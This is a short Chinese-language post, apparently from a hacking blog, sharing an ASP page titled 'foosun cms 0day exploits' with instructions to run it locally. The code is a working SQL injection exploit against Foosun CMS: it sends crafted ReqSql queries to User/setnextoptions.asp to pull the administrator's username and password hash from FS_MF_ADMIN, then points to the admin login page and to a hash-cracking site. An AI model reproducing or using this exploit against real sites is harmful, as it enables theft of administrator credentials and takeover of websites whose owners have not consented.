久久久电脑

把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了

<herd><title>foosun cms 0day exploits</title>
</herd>
<body>
<%
web=request("web")
id=request("id")
%>
关键字:会员注册step 1 of 4 step<br>
<form action='' method=post>
输入地址：<input type=text size=50 id=web name=web value="<%=web%>"><br>
要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br>
<input type=submit value="我要暴">
</form>
<form>

<%

 function bin2str(bin)
        dim tmp,ustr
        tmp=""
        for i=1 to LenB(bin)-1
            ustr=AscB(MidB(bin,i,1))
            if ustr>127 then
                i=i+1
                tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))
            else
                tmp=tmp&chr(ustr)
            end if
        next
        bin2str=tmp
    end function
webuser=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id

webpass=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id

if web="" then
else
set x=server.createObject("Microsoft.XMLHTTP")
    x.open "get",webuser,false
    x.send
    str=bin2str(x.responseBody)
response.write "你暴的网站地址："&web&"<br><br>第"&id&"位的管理员<br>"
response.write "<br><a href='"&web&"/Admin/login.asp' target=""_blank"">网站后台地址</a><br>"
for i=126 to len(str)
mid1=mid1&mid(str,i,1)
next
response.write "<br>------------------<br>帐号："&mid1&"<br>"

x.open "get",webpass,false
    x.send
    str=bin2str(x.responseBody)
for i=126 to len(str)
mid2=mid2&mid(str,i,1)
next
 response.write "<br>密码："&mid2&"<br>------------------<br>"
 response.write "<br>爆出咯，可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>"

    set x=nothing
end if
%>

具体的利用方法请参考源码。

来源:http://huairen.me/archives/68.html